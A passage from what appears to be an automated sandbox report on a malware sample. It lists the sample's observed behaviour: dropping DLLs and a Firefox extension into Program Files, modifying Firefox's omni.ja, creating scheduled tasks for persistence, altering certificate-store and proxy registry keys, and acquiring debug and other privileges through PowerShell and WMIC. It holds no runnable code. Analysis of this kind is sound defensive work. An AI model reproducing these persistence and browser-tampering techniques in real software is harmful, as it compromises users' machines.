File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File created C:\Program Files (x86)\prAQyJMeU\kFKuXmE.xml C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File created C:\Program Files (x86)\zNBDoCPwUgCU2\flOCMDDWtlZqk.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File created C:\Program Files (x86)\zNBDoCPwUgCU2\RTSVFYZ.xml C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File created C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\lZIHaQO.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File created C:\Program Files (x86)\hkBthRLftwjEC\JzivGgV.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File created C:\Program Files (x86)\oGdIbQIKIHUn\MoThlzV.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File created C:\Program Files (x86)\prAQyJMeU\lCDWlq.dll C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File created C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\SFcnKKv.xml C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
File created C:\Program Files (x86)\hkBthRLftwjEC\acvJZfh.xml C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bcicWGWSPuqTxjDSpV.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\emrEEeoVdUigmulhl.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\rbzCIowvsKWRrhO.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\EXxaHtUqjXkXqVrbU.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38fd360b-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "5" C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38fd360b-0000-0000-0000-d01200000000} C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Users\Admin\AppData\Local\Temp\7zS636D.tmp\Install.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\MokFeus.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
